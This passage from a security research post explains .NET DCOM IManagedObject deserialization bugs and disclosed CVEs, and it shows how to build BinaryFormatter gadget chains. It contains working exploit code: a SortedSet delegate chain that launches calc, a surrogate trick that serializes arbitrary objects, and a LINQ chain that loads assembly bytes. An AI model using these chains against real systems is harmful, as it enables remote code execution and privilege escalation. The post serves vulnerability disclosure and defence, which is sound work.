A client can now connect to the COM server using its CLSID (defined by the Guid attribute on COMObject). This is in fact so simple to do that a large number of core classes in .NET are marked as COM visible and registered for use by any COM client, even those not written in .NET.

To make this all work the .NET runtime hides a large amount of boilerplate from the developer. There are a couple of mechanisms to influence this boilerplate interoperability code, such as the InterfaceType attribute which defines whether the COM interface is derived from IUnknown or IDispatch, but for the most part you get what you’re given.

One thing developers perhaps don’t realize is that it’s not just the interfaces you specify which get exported from the .NET COM object; the runtime adds a number of “management” interfaces as well. These interfaces are implemented by wrapping the .NET object inside a [COM Callable Wrapper](<https://msdn.microsoft.com/en-us/library/f07c8z1c(v=vs.110).aspx>) (CCW).

We can enumerate what interfaces are exposed by the CCW. Taking System.Object as an example, the following table shows what interfaces are supported along with how each interface is implemented, either dynamically at runtime or statically implemented inside the runtime.

| Interface Name | Implementation Type |
|---|---|
| _Object | Dynamic |
| IConnectionPointContainer | Static |
| IDispatch | Dynamic |
| IManagedObject | Static |
| IMarshal | Static |
| IProvideClassInfo | Static |
| ISupportErrorInfo | Static |
| IUnknown | Dynamic |

The _Object interface refers to the COM visible representation of the System.Object class which is the root of all .NET objects; it must be generated dynamically as it’s dependent on the .NET object being exposed. On the other hand IManagedObject is implemented by the runtime itself and the implementation is shared across all CCWs.

I started looking at the exposed COM attack surface for .NET back in 2013 when I was investigating Internet Explorer sandbox escapes. One of the COM objects you could access outside the sandbox was the .NET [ClickOnce Deployment](<https://msdn.microsoft.com/en-us/library/t71a733d(v=vs.80).aspx>) broker (DFSVC), which turned out to be implemented in .NET, which is probably not too surprising. I actually found two issues, not in DFSVC itself but instead in the _Object interface exposed by all .NET COM objects. The _Object interface looks like the following (in C++).

```cpp
struct _Object : public IDispatch {
    HRESULT ToString(BSTR* pRetVal);
    HRESULT Equals(VARIANT obj, VARIANT_BOOL* pRetVal);
    HRESULT GetHashCode(long* pRetVal);
    HRESULT GetType(_Type** pRetVal);
};
```

The first bug (which resulted in [CVE-2014-0257](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0257>)) was in the GetType method. This method returns a COM object which can be used to access the [.NET reflection APIs](<https://msdn.microsoft.com/en-us/library/f7ykdhsy(v=vs.110).aspx>). As the returned _Type COM object was running inside the server you could call a chain of methods which resulted in getting access to the [Process.Start](<https://msdn.microsoft.com/en-us/library/h6ak8zt5(v=vs.110).aspx>) method, which you could call to escape the sandbox. If you want more details about that you can look at the PoC I wrote and put up on [Github](<https://github.com/tyranid/IE11SandboxEscapes/blob/master/CVE-2014-0257/CVE-2014-0257.cpp>). Microsoft fixed this by preventing access to the reflection APIs over DCOM.

The second issue was more subtle and is a byproduct of a feature of .NET interop which presumably no-one realized would be a security liability. Loading the .NET runtime requires quite a lot of additional resources, therefore the default for a native COM client calling methods on a .NET COM server is to let COM and the CCW manage the communication, even if this is a performance hit.
Microsoft could have chosen to use the COM marshaler to force .NET to be loaded in the client, but this seems overzealous, not even counting the possibility that the client might not even have a compatible version of .NET installed.

When .NET interops with a COM object it creates the inverse of the CCW, the [Runtime Callable Wrapper](<https://msdn.microsoft.com/en-us/library/8bwh56xe(v=vs.110).aspx>) (RCW). This is a .NET object which implements a runtime version of the COM interface and marshals it to the COM object. Now it’s entirely possible that the COM object is actually written in .NET; it might even be in the same [Application Domain](<https://msdn.microsoft.com/en-us/library/2bh4z9hs(v=vs.110).aspx>). If .NET didn’t do something you could end up with a double performance hit, marshaling in the RCW to call a COM object which is actually a CCW to a managed object.

It would be nice to try and “unwrap” the managed object from the CCW and get back a real .NET object. This is where the villain in this piece comes into play, the [IManagedObject](<https://msdn.microsoft.com/en-us/library/cc233673.aspx>) interface, which looks like the following:

```cpp
struct IManagedObject : public IUnknown {
    HRESULT GetObjectIdentity(
        BSTR* pBSTRGUID,
        int* AppDomainID,
        int* pCCW);

    HRESULT GetSerializedBuffer(
        BSTR* pBSTR
    );
};
```

When the .NET runtime gets hold of a COM object it will go through a process to determine whether it can “unwrap” the object from its CCW and avoid creating an RCW. This process is [documented](<https://msdn.microsoft.com/en-us/library/cc233722.aspx>) but in summary the runtime will do the following:

1. Call QueryInterface on the COM object to determine if it implements the IManagedObject interface. If not then return an appropriate RCW.

2. Call GetObjectIdentity on the interface. If the GUID matches the per-runtime GUID (generated at runtime startup) and the AppDomain ID matches the current AppDomain ID then look up the CCW value in a runtime table, extract a pointer to the real managed object and return it.

3. Call GetSerializedBuffer on the interface. The runtime will check if the .NET object is serializable; if so it will pass the object to [BinaryFormatter::Serialize](<https://msdn.microsoft.com/en-us/library/c5sbs8z9(v=vs.110).aspx>) and package the result in a Binary String (BSTR). This will be returned to the client, which will now attempt to deserialize the buffer to an object instance by calling [BinaryFormatter::Deserialize](<https://msdn.microsoft.com/en-us/library/b85344hz(v=vs.110).aspx>).

Both steps 2 and 3 sound like a bad idea. For example, while in step 2 the per-runtime GUID can’t be guessed, if you have access to any other object in the same process (such as the COM object exposed by the server itself) you can call GetObjectIdentity on that object and replay the GUID and AppDomain ID back to the server. This doesn’t really gain you much though; the CCW value is just a number, not a pointer, so at best you’ll be able to extract objects which already have a CCW in place.

Instead it’s step 3 which is really nasty. Arbitrary deserialization is dangerous in almost any language (take your pick: [Java](<https://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class>), [PHP](<https://www.owasp.org/index.php/PHP_Object_Injection>), [Ruby](<https://www.rapid7.com/db/modules/exploit/multi/http/rails_xml_yaml_code_exec>) etc.) and .NET is no different.
In fact my first ever Blackhat USA [presentation](<https://www.youtube.com/watch?v=Xfbu-pQ1tIc>) ([whitepaper](<https://www.contextis.com/documents/1/are_you_my_type.pdf>)) was on this very topic and there’s been follow up work since (such as [this blog post](<https://blog.scrt.ch/2016/05/12/net-serialiception/>)). Clearly this is an issue we can exploit; first let’s look at it from the perspective of privilege escalation.

## Elevating Privileges

How can we get a COM server written in .NET to do the arbitrary deserialization? We need the server to try and create an RCW for a serializable .NET object exposed over COM. It would be nice if this could also be done generically; it just so happens that on the standard _Object interface there exists a function we can pass an arbitrary object to, the Equals method. The purpose of Equals is to compare two objects for equality. If we pass a .NET COM object to the server’s Equals method the runtime must try and convert it to an RCW so that the managed implementation can use it. At this point the runtime wants to be helpful and checks if it’s really a CCW wrapped .NET object. The server runtime calls GetSerializedBuffer, which results in arbitrary deserialization in the server process.

This is how I exploited the ClickOnce Deployment broker a second time, resulting in [CVE-2014-4073](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4073>). The trick to exploiting this was to send a serialized [Hashtable](<https://msdn.microsoft.com/en-us/library/system.collections.hashtable(v=vs.110).aspx>) to the server which contains a COM implementation of the [IHashCodeProvider](<https://msdn.microsoft.com/en-us/library/system.collections.ihashcodeprovider(v=vs.110).aspx>) interface. When the Hashtable runs its custom deserialization code it needs to rebuild its internal hash structures; it does that by calling [IHashCodeProvider::GetHashCode](<https://msdn.microsoft.com/en-us/library/system.collections.ihashcodeprovider.gethashcode(v=vs.110).aspx>) on each key. By adding a [Delegate](<https://msdn.microsoft.com/en-us/library/system.delegate(v=vs.110).aspx>) object, which is serializable, as one of the keys we’ll get it passed back to the client. By writing the client in native code the automatic serialization through IManagedObject won’t occur when passing the delegate back to us. The delegate object gets stuck inside the server process but the CCW is exposed to us, which we can call. Invoking the delegate results in the specified function being executed in the server context, which allows us to start a new process with the server’s privileges. As this works generically I even wrote a tool to do it for any .NET COM server which you can [find on github](<https://github.com/tyranid/ExploitDotNetDCOM/tree/master/ExploitDotNetDCOMSerializer>).

Microsoft could have fixed CVE-2014-4073 by changing the behavior of IManagedObject::GetSerializedBuffer, but they didn’t. Instead Microsoft rewrote the broker in native code. Also a blog post was published warning developers of the [dangers of .NET DCOM](<https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/>). However, what they didn’t do is deprecate any of the APIs to register DCOM objects in .NET, so unless a developer is particularly security savvy and happens to read a Microsoft security blog they probably don’t realize it’s a problem.
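A defender’s way of finding the servers the paragraph above is concerned with, as an added example that is not code from the original post or from the author’s tool: it walks HKCR\CLSID for out-of-process servers whose LocalServer32 binary is a managed assembly (so every object they serve carries a CCW and therefore IManagedObject) and reports the identity each one runs under. The registry layout used (CLSID\{…}\LocalServer32, AppID with RunAs or LocalService) is standard COM registration; ManagedComServerAudit and ServerEntry are names chosen for this example.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using Microsoft.Win32;

// Added example (not from the original post): inventory of registered
// out-of-process COM servers implemented in .NET. Such servers hand out
// CCW-wrapped objects, which is what exposes IManagedObject::GetSerializedBuffer
// to any client on the other side of a privilege boundary.
public sealed class ServerEntry {
    public string Clsid;
    public string ExePath;
    public string Identity;   // RunAs value, hosting service, or activator default

    public override string ToString() {
        return Clsid + " " + ExePath + " [" + Identity + "]";
    }
}

public static class ManagedComServerAudit {
    // Turns a LocalServer32 command line such as
    //   "C:\Program Files\Vendor\Server.exe" /automation
    // into the bare executable path (environment variables expanded).
    public static string ExtractExePath(string commandLine) {
        if (string.IsNullOrWhiteSpace(commandLine)) return null;
        string cmd = Environment.ExpandEnvironmentVariables(commandLine.Trim());
        if (cmd.StartsWith("\"")) {
            int end = cmd.IndexOf('"', 1);
            return end > 1 ? cmd.Substring(1, end - 1) : null;
        }
        // Unquoted form: the path ends at the first ".exe".
        int idx = cmd.IndexOf(".exe", StringComparison.OrdinalIgnoreCase);
        return idx > 0 ? cmd.Substring(0, idx + 4) : cmd;
    }

    // GetAssemblyName only reads the PE/CLR headers, nothing is executed;
    // a native image makes it throw BadImageFormatException.
    public static bool IsManagedAssembly(string path) {
        try {
            AssemblyName.GetAssemblyName(path);
            return true;
        } catch (BadImageFormatException) {
            return false;
        } catch (IOException) {           // missing file, path too long, ...
            return false;
        } catch (UnauthorizedAccessException) {
            return false;
        }
    }

    // Describes how the server runs: an explicit RunAs identity, a Windows
    // service (LocalService value), or whatever the activator defaults to.
    static string DescribeIdentity(RegistryKey clsidKey) {
        string appId = clsidKey.GetValue("AppID") as string;
        if (appId == null) return "no AppID (activator default)";
        using (RegistryKey appKey = Registry.ClassesRoot.OpenSubKey(@"AppID\" + appId)) {
            if (appKey == null) return "AppID " + appId + " not found";
            string runAs = appKey.GetValue("RunAs") as string;
            if (runAs != null) return "RunAs=" + runAs;
            string service = appKey.GetValue("LocalService") as string;
            if (service != null) return "service=" + service;
            return "AppID " + appId + " (activator default)";
        }
    }

    public static List<ServerEntry> FindManagedServers() {
        var found = new List<ServerEntry>();
        using (RegistryKey clsidRoot = Registry.ClassesRoot.OpenSubKey("CLSID")) {
            foreach (string clsid in clsidRoot.GetSubKeyNames()) {
                using (RegistryKey key = clsidRoot.OpenSubKey(clsid))
                using (RegistryKey server = key == null ? null : key.OpenSubKey("LocalServer32")) {
                    if (server == null) continue;
                    string exe = ExtractExePath(server.GetValue(null) as string);
                    if (exe == null || !IsManagedAssembly(exe)) continue;
                    found.Add(new ServerEntry {
                        Clsid = clsid, ExePath = exe, Identity = DescribeIdentity(key)
                    });
                }
            }
        }
        return found;
    }

    public static void Main() {
        foreach (ServerEntry entry in FindManagedServers()) Console.WriteLine(entry);
    }
}
```

Entries with a RunAs of a privileged account or a LocalService value are the ones worth attention first. A server that only registers itself at runtime with RegisterTypeForComClients leaves no LocalServer32 entry and needs the dynamic IManagedObject check the post describes instead.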
This bug class exists to this day. For example, when I recently received a new work laptop I did what I always do: enumerate what OEM “value add” software has been installed and see if anything was exploitable. It turns out that as part of the audio driver package a COM service written by Dolby was installed. After a couple of minutes of inspection, basically enumerating accessible interfaces for the COM server, I discovered it was written in .NET (the presence of IManagedObject is always a big giveaway). I cracked out my exploitation tool and in less than 5 minutes I had code execution at local system. This has now been fixed as CVE-2017-7293; you can find the very terse writeup [here](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1075>). Once again, as .NET DCOM is fundamentally unsafe the only thing Dolby could do was rewrite the service in native code.

## Hacking the Caller

Finding a new instance of the IManagedObject bug class focussed my mind on its other implications. The first thing to stress is that the server itself isn’t vulnerable; instead it’s only when we can force the server to act as a DCOM client calling back to the attacking application that the vulnerability can be exploited. Any .NET application which calls a DCOM object through managed COM interop should have a similar issue, not just servers. Is there likely to be any common use case for DCOM, especially in a modern Enterprise environment?

My immediate thought was Windows Management Instrumentation (WMI). Modern versions of Windows can connect to remote WMI instances using the WS-Management (WSMAN) protocol, but for legacy reasons WMI still supports a DCOM transport. One use case for WMI is to scan enterprise machines for potentially malicious behavior. One of the reasons for this resurgence is Powershell (which is implemented in .NET) having easy to use support for WMI. Perhaps PS or .NET itself will be vulnerable to this attack if they try and access a compromised workstation in the network?

Looking at MSDN, .NET supports WMI through the [System.Management](<https://msdn.microsoft.com/en-us/library/system.management(v=vs.110).aspx>) namespace. This has existed since the beginning of .NET. It supports remote access to WMI and, considering the age of the classes, it predates WSMAN and so almost certainly uses DCOM under the hood. On the PS front there’s support for WMI through cmdlets such as [Get-WmiObject](<https://technet.microsoft.com/en-us/library/ee176860.aspx>). PS version 3 (introduced in Windows 8 and Server 2008) added a new set of cmdlets including [Get-CimInstance](<https://technet.microsoft.com/en-us/itpro/powershell/windows/cimcmdlets/get-ciminstance>). Reading the related link it’s clear why the CIM cmdlets were introduced, support for WSMAN, and the link explicitly points out that the “old” WMI cmdlets use DCOM.

At this point we could jump straight into RE of the .NET and PS class libraries, but there’s an easier way. It’s likely we’d be able to see whether the .NET client queries for IManagedObject by observing the DCOM RPC traffic to a WMI server. Wireshark already has a DCOM dissector, saving us a lot of trouble. For a test I set up two VMs, one with Windows Server 2016 acting as a domain controller and one with Windows 10 as a client on the domain. Then from a Domain Administrator on the client I issued a simple WMI PS command ‘Get-WmiObject Win32_Process -ComputerName dc.network.local’ while monitoring the network using Wireshark. The following image shows what I observed:

The screenshot shows the initial creation request for the WMI DCOM object on the DC server (192.168.56.50) from the PS client (192.168.56.102).
We can see it’s querying for the IWbemLoginClientID interface, which is part of the initialization process (as documented in [MS-WMI](<https://msdn.microsoft.com/en-us/library/dd208060.aspx>)). The client then tries to request a few other interfaces; notably it asks for IManagedObject. This almost certainly indicates that a client using the PS WMI cmdlets would be vulnerable.

In order to test whether this is really a vulnerability we’ll need a fake WMI server. This would seem like it would be quite a challenge, but all we need to do is modify the registration for the winmgmt service to point to our fake implementation. As long as that service then registers a COM class with the CLSID {8BC3F05E-D86B-11D0-A075-00C04FB68820} the COM activator will start the service and serve any client an instance of our fake WMI object. If we look back at our network capture it turns out that the query for IManagedObject isn’t occurring on the main class, but instead on the IWbemServices object returned from [IWbemLevel1Login::NTLMLogin](<https://msdn.microsoft.com/en-us/library/cc250759.aspx>). But that’s okay, it just adds a bit of extra boilerplate code. To ensure it’s working we’ll implement the following code, which will tell the deserialization code to look for an unknown Assembly called Badgers.

```csharp
[Serializable, ComVisible(true)]
public class FakeWbemServices :
        IWbemServices,
        ISerializable {
    public void GetObjectData(SerializationInfo info,
                              StreamingContext context) {
        info.AssemblyName = "Badgers, Version=4.0.0.0";
        info.FullTypeName = "System.Badgers.Test";
    }

    // Rest of fake implementation...
}
```

If we successfully injected a serialized stream then we’d expect the PS process to try and look up a Badgers.dll file, and using Process Monitor that’s exactly what we find.

## Chaining Up the Deserializer

When exploiting the deserialization for local privilege escalation we can be sure that we can connect back to the server and run an arbitrary delegate. We don’t have any such guarantees in the RCE case. If the WMI client has default Windows Firewall rules enabled then we almost certainly wouldn’t be able to connect to the RPC endpoint made by the delegate object. We also need to be allowed to log in over the network to the machine running the WMI client; our compromised machine might not have a login to the domain, or the enterprise policy might block anyone but the owner from logging in to the client machine.

We therefore need a slightly different plan. Instead of actively attacking the client through exposing a new delegate object we’ll instead pass it a byte stream which when deserialized executes a desired action. In an ideal world we’d find that one serializable class which just executes arbitrary code for us. Sadly (as far as I know) no such class exists. So instead we’ll need to find a series of “Gadget” classes which when chained together perform the desired effect.

So in this situation I tend to write some quick analysis tools. .NET supports a pretty good Reflection API, so finding basic information such as whether a class is serializable or which interfaces a class supports is pretty easy to do. We also need a list of Assemblies to check; the quickest way I know of is to use the [gacutil utility](<https://msdn.microsoft.com/en-us/library/ex0ss12c%28v=vs.110%29.aspx>) installed as part of the .NET SDK (and so installed with Visual Studio). Run the command gacutil /l > assemblies.txt to create a list of assembly names you can load and process.
For a first pass we’ll look for any classes which are serializable and have delegates in them; these might be classes which when an operation is performed will execute arbitrary code. With our list of assemblies we can write some simple code like the following to find those classes, just call FindSerializableTypes for each assembly name string:

```csharp
using System;
using System.Linq;
using System.Reflection;
using System.Runtime.Serialization;

static bool IsDelegateType(Type t) {
    return typeof(Delegate).IsAssignableFrom(t);
}

static bool HasSerializedDelegate(Type t) {
    // Custom serialized objects rarely serialize their delegates.
    if (typeof(ISerializable).IsAssignableFrom(t)) {
        return false;
    }

    foreach (FieldInfo field in FormatterServices.GetSerializableMembers(t)) {
        if (IsDelegateType(field.FieldType)) {
            return true;
        }
    }
    // No delegate-typed serializable field found.
    return false;
}

static void FindSerializableTypes(string assembly_name) {
    Assembly asm = Assembly.Load(assembly_name);
    Type[] all_types;
    try {
        all_types = asm.GetTypes();
    } catch (ReflectionTypeLoadException e) {
        // Some assemblies contain types that fail to load; keep the ones that did.
        all_types = e.Types.Where(t => t != null).ToArray();
    }
    var types = all_types.Where(t => t.IsSerializable
        && t.IsClass
        && !t.IsAbstract
        && !IsDelegateType(t)
        && HasSerializedDelegate(t));
    foreach (Type type in types) {
        Console.WriteLine(type.FullName);
    }
}
```

Across my system this analysis only resulted in around 20 classes, and of those many were actually in the F# libraries which are not distributed in a default installation. However one class did catch my eye, System.Collections.Generic.ComparisonComparer<T>. You can find the implementation in the [reference source](<https://github.com/Microsoft/referencesource/blob/90b323fe52bec428fe4bd5f007e9ead6b265d553/mscorlib/system/collections/generic/comparer.cs#L157>), but as it’s so simple here it is in its entirety:

```csharp
public delegate int Comparison<T>(T x, T y);

[Serializable]
internal class ComparisonComparer<T> : Comparer<T> {
    private readonly Comparison<T> _comparison;

    public ComparisonComparer(Comparison<T> comparison) {
        _comparison = comparison;
    }

    public override int Compare(T x, T y) {
        return this._comparison(x, y);
    }
}
```

This class wraps a Comparison<T> delegate which takes two generic parameters (of the same type) and returns an integer, calling the delegate to implement the [IComparer<T>](<https://msdn.microsoft.com/en-us/library/8ehhxeaf%28v=vs.110%29.aspx>) interface. While the class is internal its creation is exposed through the [Comparer<T>::Create](<https://msdn.microsoft.com/en-us/library/hh737198%28v=vs.110%29.aspx>) static method. This is the first part of the chain; with this class and a bit of massaging of serialized delegates we can chain [IComparer<T>::Compare](<https://msdn.microsoft.com/en-us/library/bb346115%28v=vs.110%29.aspx>) to Process::Start and get an arbitrary process created. Now we need the next part of the chain, calling this comparer object with arbitrary arguments.

Comparer objects are used a lot in the generic .NET collection classes and many of these collection classes also have custom deserialization code. In this case we can abuse the [SortedSet<T>](<https://msdn.microsoft.com/en-us/library/dd412070(v=vs.110).aspx>) class; on deserialization it rebuilds its set using an internal comparer object to determine the sort order. The values passed to the comparer are the entries in the set, which are under our complete control. Let’s write some test code to check it works as we expect:

```csharp
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.Serialization.Formatters.Binary;

static void TypeConfuseDelegate(Comparison<string> comp) {
    FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList",
        BindingFlags.NonPublic | BindingFlags.Instance);
    object[] invoke_list = comp.GetInvocationList();
    // Modify the invocation list to add Process::Start(string, string)
    invoke_list[1] = new Func<string, string, Process>(Process.Start);
    fi.SetValue(comp, invoke_list);
}

// Create a simple multicast delegate (two entries, both String::Compare for now).
Delegate single = new Comparison<string>(String.Compare);
Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(single, single);

// Create set with original comparer.
IComparer<string> comp = Comparer<string>.Create(d);
SortedSet<string> set = new SortedSet<string>(comp);

// Setup values to call calc.exe with a dummy argument.
set.Add("calc");
set.Add("adummy");

TypeConfuseDelegate(d);

// Test serialization.
BinaryFormatter fmt = new BinaryFormatter();
MemoryStream stm = new MemoryStream();
fmt.Serialize(stm, set);
stm.Position = 0;
fmt.Deserialize(stm);

// Calculator should execute during Deserialize.
```

The only weird thing about this code is TypeConfuseDelegate. It’s a long standing issue that .NET delegates don’t always enforce their type signature, especially the return value. In this case we create a two entry multicast delegate (a delegate which will run multiple single delegates sequentially), setting one delegate to String::Compare which returns an int, and another to Process::Start which returns an instance of the Process class. This works, even when deserialized, and invokes the two separate methods. It will then return the created process object as an integer, which just means it will return the pointer to the instance of the process object.
So we end up with a chain which looks like the following:

While this is a pretty simple chain it has a couple of problems which make it less than ideal for our use:

1. The Comparer<T>::Create method and the corresponding class were only introduced in .NET 4.5, which covers Windows 8 and above but not Windows 7.

2. The exploit relies in part on a type confusion of the return value of the delegate. While it’s only converting the Process object to an integer this is somewhat less than ideal and could have unexpected side effects.

3. Starting a process is a bit on the noisy side; it would be nicer to load our code from memory.

So we’ll need to find something better. We want something which works at a minimum on .NET 3.5, which would be the version on Windows 7 which Windows Update would automatically update you to. Also it shouldn’t rely on undefined behaviour or on loading our code from outside of the DCOM channel, such as over a HTTP connection. Sounds like a challenge to me.

## Improving the Chain

While looking at some of the other classes which are serializable I noticed a few in the [System.Workflow.ComponentModel.Serialization](<https://msdn.microsoft.com/en-us/library/system.workflow.componentmodel.serialization(v=vs.110).aspx>) namespace. This namespace contains classes which are part of the [Windows Workflow Foundation](<https://msdn.microsoft.com/en-us/library/jj684582.aspx>), which is a set of libraries to build execution pipelines to perform a series of tasks. This alone sounds interesting, and it turns out I have exploited the core functionality before as a bypass for [Code Integrity in Windows Powershell](<http://www.exploit-monday.com/2013/07/WinRT-ARM-Shellcode.html?showComment=1376669197806#c4072135924776553338>).

This led me to finding the [ObjectSerializedRef](<https://github.com/Microsoft/referencesource/blob/4fe4349175f4c5091d972a7e56ea12012f1e7170/System.Workflow.ComponentModel/AuthoringOM/Serializer/ActivitySurrogateSelector.cs#L135>) class. This looks very much like a class which will deserialize any object type, not just serializable ones. If this was the case then that would be a very powerful primitive for building a more functional deserialization chain.

```csharp
[Serializable]
private sealed class ObjectSerializedRef : IObjectReference,
                                           IDeserializationCallback {
    private Type type;
    private object[] memberDatas;

    [NonSerialized]
    private object returnedObject;

    object IObjectReference.GetRealObject(StreamingContext context) {
        returnedObject = FormatterServices.GetUninitializedObject(type);
        return this.returnedObject;
    }

    void IDeserializationCallback.OnDeserialization(object sender) {
        string[] array = null;
        MemberInfo[] serializableMembers =
            FormatterServicesNoSerializableCheck.GetSerializableMembers(
                type, out array);
        FormatterServices.PopulateObjectMembers(returnedObject,
            serializableMembers, memberDatas);
    }
}
```

Looking at the implementation, the class was used as a serialization surrogate exposed through the [ActivitySurrogateSelector](<https://msdn.microsoft.com/en-us/library/system.workflow.componentmodel.serialization.activitysurrogateselector%28v=vs.110%29.aspx>) class. This is a feature of the .NET serialization API: you can specify a “Surrogate Selector” during the serialization process which will replace an object with a surrogate class. When the stream is deserialized this surrogate class contains enough information to reconstruct the original object. One use case is to handle the serialization of non-serializable classes, but ObjectSerializedRef goes beyond a specific use case and allows you to deserialize anything. A test was in order:

```csharp
using System;
using System.IO;
using System.Reflection;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
// Requires a reference to System.Workflow.ComponentModel.dll.
using System.Workflow.ComponentModel.Serialization;

// Definitely non-serializable class.
class NonSerializable {
    private string _text;

    public NonSerializable(string text) {
        _text = text;
    }

    public override string ToString() {
        return _text;
    }
}

// Custom serialization surrogate
class MySurrogateSelector : SurrogateSelector {
    public override ISerializationSurrogate GetSurrogate(Type type,
            StreamingContext context, out ISurrogateSelector selector) {
        selector = this;
        if (!type.IsSerializable) {
            // ObjectSurrogate is a private type nested in the public
            // ActivitySurrogateSelector class, so look it up by reflection.
            Type t = typeof(ActivitySurrogateSelector).GetNestedType(
                "ObjectSurrogate", BindingFlags.NonPublic);
            return (ISerializationSurrogate)Activator.CreateInstance(t);
        }

        return base.GetSurrogate(type, context, out selector);
    }
}

static void TestObjectSerializedRef() {
    BinaryFormatter fmt = new BinaryFormatter();
    MemoryStream stm = new MemoryStream();
    fmt.SurrogateSelector = new MySurrogateSelector();
    fmt.Serialize(stm, new NonSerializable("Hello World!"));
    stm.Position = 0;

    // Should print Hello World!.
    Console.WriteLine(fmt.Deserialize(stm));
}
```

The ObjectSurrogate class seems to work almost too well. This class totally destroys any hope of securing an untrusted BinaryFormatter stream and it’s available from .NET 3.0. Any class which didn’t mark itself as serializable is now a target. It’s going to be pretty easy to find a class which will invoke an arbitrary delegate during deserialization, as the developer will not be doing anything to guard against such an attack vector.

Now just to choose a target to build out our deserialization chain.
I could have chosen to poke further at the Workflow classes, but the API is horrible (in fact in .NET 4 Microsoft replaced the old APIs with a new, slightly nicer one). Instead I\u2019ll pick a really easy to use target, Language Integrated Query (LINQ).\n\n** \n**\n\nLINQ was introduced in .NET 3.5 as a core language feature. A new SQL-like syntax was introduced to the C# and VB compilers to perform queries across enumerable objects, such as Lists or Dictionaries. An example of the syntax which filters a list of names based on length and returns the list uppercased is as follows:\n\n** \n**\n\nstring[] names = { \"Alice\", \"Bob\", \"Carl\" }; \n \nIEnumerable<string> query = from name in names \nwhere name.Length > 3 \norderby name \nselect name.ToUpper(); \n \nforeach (string item in query) { \nConsole.WriteLine(item); \n}\n\n** \n**\n\nYou can also view LINQ not as a query syntax but instead a way of doing list comprehension in .NET. If you think of \u2018select\u2019 as equivalent to \u2018map\u2019 and \u2018where\u2019 to \u2018filter\u2019 it might make more sense. Underneath the query syntax is a series of methods implemented in the [System.Linq.Enumerable](<https://msdn.microsoft.com/en-us/library/system.linq.enumerable\\(v=vs.110\\).aspx>) class. You can write it using normal C# syntax instead of the query language; if you do the previous example becomes the following:\n\n** \n**\n\nIEnumerable<string> query = names.Where(name => name.Length > 3) \n.OrderBy(name => name) \n.Select(name => name.ToUpper());\n\n** \n**\n\nThe methods such as Where take two parameters, a list object (this is hidden in the above example) and a delegate to invoke for each entry in the enumerable list. The delegate is typically provided by the application, however there\u2019s nothing to stop you replacing the delegates with system methods. The important thing to bear in mind is that the delegates are not invoked until the list is enumerated. 
This means we can build an enumerable list using LINQ methods, serialize it using the ObjectSurrogate (LINQ classes are not themselves serializable) then if we can force the deserialized list to be enumerated it will execute arbitrary code.\n\n** \n**\n\nUsing LINQ as a primitive we can create a list which when enumerated maps a byte array to an instance of a type in that byte array by the following sequence:\n\n** \n**\n\n\n\nThe only tricky part is step 2, we\u2019d like to extract a specific type but our only real option is to use the [Enumerable.Join](<https://msdn.microsoft.com/en-us/library/system.linq.enumerable.join%28v=vs.110%29.aspx>) method which requires some weird kludges to get it to work. A better option would have been to use [Enumerable.Zip](<https://msdn.microsoft.com/en-us/library/dd267698%28v=vs.110%29.aspx>) but that was only introduced in .NET 4. So instead we\u2019ll just get all the types in the loaded assembly and create them all, if we just have one type then this isn\u2019t going to make any difference. How does the implementation look in C#?\n\n** \n**\n\nstatic IEnumerable CreateLinq(byte[] assembly) { \nList<byte[]> base_list = new List<byte[]>(); \nbase_list.Add(assembly); \n \nvar get_types_del = (Func<Assembly, IEnumerable<Type>>)\n\nDelegate.CreateDelegate( \ntypeof(Func<Assembly, IEnumerable<Type>>), \ntypeof(Assembly).GetMethod(\"GetTypes\")); \n \nreturn base_list.Select(Assembly.Load) \n.SelectMany(get_types_del) \n.Select(Activator.CreateInstance); \n}\n\n** \n**\n\nThe only non-obvious part of the C# implementation is the delegate for Assembly::GetTypes. What we need is a delegate which takes an Assembly object and returns a list of Type objects. However as GetTypes is an instance method the default would be to capture the Assembly class and store it inside the delegate object, which would result in a delegate which took no parameters and returned a list of Type. 
We can get around this by using the reflection APIs to create an open delegate to an instance member. An open delegate doesn\u2019t store the object instance; instead it exposes it as an additional Assembly parameter, exactly what we want.\n\nWith our enumerable list we can get the assembly loaded and our own code executed, but how do we get the list enumerated to start the chain? For this I decided to try and find a class which, when calling ToString (a pretty common method), would enumerate the list. This is easy in Java: almost all the collection classes have this exact behavior. Sadly it seems .NET doesn't follow Java in this respect. So I modified my analysis tools to try and hunt for gadgets which would get us there. To cut a long story short, I found a chain from ToString to IEnumerable through three separate classes. The chain looks something like the following:\n\nAre we done yet? No, just one more step: we need to call ToString on an arbitrary object during deserialization. Of course I wouldn\u2019t have chosen ToString if I didn\u2019t already have a method to do this. In this final case I\u2019ll go back to abusing poor, old Hashtable. During deserialization of the Hashtable class it will rebuild its key set, which we already know about as this is how I exploited serialization for local EoP. If two keys are equal then the deserialization will fail with the Hashtable throwing an exception, resulting in running the [following code](<https://github.com/Microsoft/referencesource/blob/4fe4349175f4c5091d972a7e56ea12012f1e7170/mscorlib/system/collections/hashtable.cs#L959>):\n\nthrow new ArgumentException( \n Environment.GetResourceString(\"Argument_AddingDuplicate__\", \n buckets[bucketNumber].key, key));\n\nIt\u2019s not immediately obvious why this would be useful. 
